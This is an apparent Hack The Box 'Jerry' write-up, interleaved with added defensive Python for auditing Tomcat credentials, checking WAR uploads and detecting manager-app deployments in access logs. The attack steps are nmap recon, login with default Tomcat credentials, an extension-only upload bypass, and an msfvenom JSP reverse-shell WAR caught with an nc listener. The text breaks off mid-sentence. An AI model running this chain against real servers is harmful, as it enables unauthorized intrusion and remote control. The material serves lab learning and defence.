HacktheBox — Jerry Writeup
So, Jerry from Hack The Box has been retired, which means that write-ups are allowed. I am fairly new to security and want to get on the offensive side. With this, I'm preparing myself before I take the PWK course to get my OSCP certification.
What is Hack the Box?
Hack The Box is an online platform where you can practice your penetration testing skills and share ideas with other members. Learn more about it here. If you are interested in hacking (ethically), one way to learn about it is through this site. Here, machines are usually called "boxes".
This box is intended for beginners and is a very simple one. So if you are interested in penetration testing, you can start playing with this box. I will try to explain even the smallest details to clear things up, even if you are just starting out. I hope this write-up helps you.
Let’s get started.
Recon: We start with an nmap scan:
nmap 10.10.10.95 -sV -sC -oA nmap/initial
-sV = version fingerprinting
-sC = runs the default scripts against the target
-oA = outputs in all formats, stored in my nmap directory under the name "initial"
The only open port found by the scan is port 8080. It is serving HTTP, and the version banner identifies Apache Tomcat.
Enumeration: Going to the website, we find the home page. I tried clicking the options available on the page. It is helpful to explore the functionality of a website to understand how it was developed or coded; this can help you identify possible entry points.
Clicking Server Status takes us to a page that shows credentials:
user:tomcat and password: s3cret
This is common on many web servers: some admins do not remove the default pages, and those pages contain the default credentials. 😞
We were able to login using those credentials.
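The lesson from this step is on the defensive side: Tomcat's manager credentials live in tomcat-users.xml, and the tomcat/s3cret pair shown on that page is the example from Tomcat's own documentation. The following audit script is an added example, not part of the writeup or of Tomcat; it parses a constructed tomcat-users.xml (same layout as the real file, sample accounts invented here) and flags the documentation credentials and any deploy-capable account with a short password. The list of known default pairs is an assumption and contains only the pair from the writeup; extend it from your own inventory.

```python
import xml.etree.ElementTree as ET

# Constructed sample tomcat-users.xml (not taken from the box). It mirrors the
# layout of Tomcat's real config file; the accounts are invented, except that
# the credential pair from the writeup is left in place.
SAMPLE_TOMCAT_USERS = """\
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
  <user username="ops-deployer" password="Zq8!long-random-value" roles="manager-script"/>
</tomcat-users>
"""

# Assumption: credential pairs known to come from Tomcat's shipped examples.
# Only the pair the writeup found is listed; add your own from inventory.
KNOWN_DEFAULT_PAIRS = {("tomcat", "s3cret")}

# Roles that grant deploy or admin rights through the manager application.
PRIVILEGED_ROLES = {"manager-gui", "manager-script", "manager-jmx", "admin-gui"}

def audit_tomcat_users(xml_text):
    """Return (username, reason) findings for accounts that must be fixed
    before the manager app is reachable from anywhere."""
    root = ET.fromstring(xml_text)
    findings = []
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":  # drop the XML namespace prefix
            continue
        name = elem.get("username", "")
        pwd = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        if (name, pwd) in KNOWN_DEFAULT_PAIRS:
            findings.append((name, "default credentials from Tomcat examples"))
        elif roles & PRIVILEGED_ROLES and len(pwd) < 12:
            findings.append((name, "privileged role with short password"))
    return findings

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{user}: {reason}")
```

Run it against the real file on a server you administer (typically conf/tomcat-users.xml under the Tomcat install) to confirm the example account was never left in place; on the box above, the first finding is exactly what let the attacker in.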
Initial foothold: After scrolling through the page, we see that we can deploy a directory or a WAR file. A WAR file is a packaged Java web application (a JAR-style archive) that Tomcat can deploy. 🚨
My next step is to test whether we can upload arbitrary files. I created a text file and tried uploading it.
It seems that only .war files are allowed to be uploaded.
One simple bypass is to change the file's extension and re-upload it. 👌
I simply made a copy of test.txt, named it test.war (both are plain text files), and tried uploading it. It was successful! ✋
Aha! This means we can upload our payload with the .war extension. As far as we have tested, the check only looks at the file extension; it does not inspect the content, the header, or any other indicator of what type of file it really is. We can see that our test.war has been uploaded. Next we can try uploading a reverse shell to get access to the system.
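To make the difference concrete, here is an added example (my own code, not the writeup's or Tomcat's) showing the extension-only acceptance the writeup observed next to a content-aware check. A WAR is a ZIP archive, so a hardened check can at least require a valid archive with the WEB-INF/ layout a web application must have. The sample inputs are constructed: a renamed text file, and a minimal benign WAR built in memory.

```python
import io
import zipfile

def accept_by_extension(filename, data):
    """Weak check, matching what the box did: accept any name ending in .war
    regardless of the bytes inside."""
    return filename.lower().endswith(".war")

def accept_by_content(filename, data):
    """Hardened check: .war extension AND a readable ZIP archive AND the
    WEB-INF/ directory every deployable web application carries."""
    if not filename.lower().endswith(".war"):
        return False
    if not data.startswith(b"PK\x03\x04"):  # ZIP local-file-header signature
        return False
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:
        return False
    return any(n.startswith("WEB-INF/") for n in names)

def build_sample_war():
    """Constructed minimal, benign WAR used only to exercise the checks."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
        zf.writestr("index.html", "<h1>hello</h1>")
    return buf.getvalue()

# The test.txt -> test.war trick from the writeup, as constructed bytes.
TEXT_RENAMED = b"this is just a text file\n"
REAL_WAR = build_sample_war()

if __name__ == "__main__":
    for name, data in (("test.war", TEXT_RENAMED), ("app.war", REAL_WAR)):
        print(name, "ext-only:", accept_by_extension(name, data),
              "content:", accept_by_content(name, data))
```

The caveat a defender should keep in mind: a content check only rejects files that are not web applications. A well-formed WAR carrying a malicious JSP passes it, because deploying code is exactly what the manager app is for. The real control is who can reach the manager app and with which credentials, not what the upload filter accepts.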
What is a reverse shell?
According to the Infosec Institute, a reverse shell is a type of shell in which the target machine connects back to the attacking machine. The attacking machine runs a listener on a port and receives the connection; through it, code or command execution is achieved.
I then create a payload with msfvenom that spawns a reverse shell, packed as a .war file. msfvenom lets you create payloads in a very simple way.
We create our payload by using the command:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=(LHOST) LPORT=(LPORT) -f war > reverse.war
LHOST = the IP address the shell connects back to (the machine running our listener)
LPORT = the port the shell connects back to (the port our listener uses)
-f = output format
The created payload is named reverse.war. We then run the file command on our payload, just to check that we built it correctly. The file command identifies what type of file something is.
We upload our payload and set up our listener. You can use any port you want, but I suggest using ports that are not commonly used.
nc -nlvp 4438
-l = listening mode
-p = local port to listen on
-n = do not perform DNS lookups; saves time and avoids misleading results
-v = verbose, more detail
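Seen from the server side, every step of this foothold passes through the manager application and lands in Tomcat's access log, which is where a defender would catch it. The detector below is an added example (not from the writeup or from Tomcat) run over constructed log lines in Tomcat's default "common" pattern (%h %l %u %t "%r" %s %b). The admin network, the usernames and the addresses (documentation ranges) are assumptions; the manager endpoints (/manager/html/upload for browser uploads, /manager/text/deploy for the scripting interface) are Tomcat's real paths.

```python
import ipaddress
import re

# Constructed access-log lines; the addresses are documentation ranges.
SAMPLE_ACCESS_LOG = """\
203.0.113.9 - tomcat [01/Jan/2000:10:00:01 +0000] "GET /manager/html HTTP/1.1" 200 11943
203.0.113.9 - tomcat [01/Jan/2000:10:00:40 +0000] "POST /manager/html/upload HTTP/1.1" 200 12001
203.0.113.9 - - [01/Jan/2000:10:01:02 +0000] "GET /reverse/ HTTP/1.1" 200 0
192.0.2.5 - admin [01/Jan/2000:10:02:30 +0000] "PUT /manager/text/deploy?path=/billing HTTP/1.1" 200 48
198.51.100.7 - - [01/Jan/2000:10:03:00 +0000] "GET /docs/ HTTP/1.1" 200 19208
"""

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Assumption: the only network that should ever reach the manager app.
ADMIN_NETWORKS = [ipaddress.ip_network("192.0.2.0/24")]

# Manager endpoints that change what is deployed on the server.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/html/deploy", "/manager/text/deploy")

def detect_manager_activity(log_text):
    """Return (source, user, reason) alerts for manager-app use that a
    defender wants to see: deployments, and any access from outside the
    admin network."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        host, user, path, status = m["host"], m["user"], m["path"], m["status"]
        if not path.startswith("/manager/"):
            continue
        src = ipaddress.ip_address(host)
        outside = not any(src in net for net in ADMIN_NETWORKS)
        deploy = path.split("?", 1)[0] in DEPLOY_PATHS and status == "200"
        if deploy and outside:
            alerts.append((host, user, "deployment via manager app from non-admin network"))
        elif deploy:
            alerts.append((host, user, "deployment via manager app"))
        elif outside:
            alerts.append((host, user, "manager app reached from non-admin network"))
    return alerts

if __name__ == "__main__":
    for src, user, reason in detect_manager_activity(SAMPLE_ACCESS_LOG):
        print(f"{src} ({user}): {reason}")
```

In practice the successful upload from outside the admin network is the line to page on; pairing it with the new context path being requested right afterwards (the third sample line) is what turns "someone deployed something" into "someone deployed something and then ran it".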
We get our Windows-based shell, since the box runs Windows Server. We navigate through the folders and find the flags under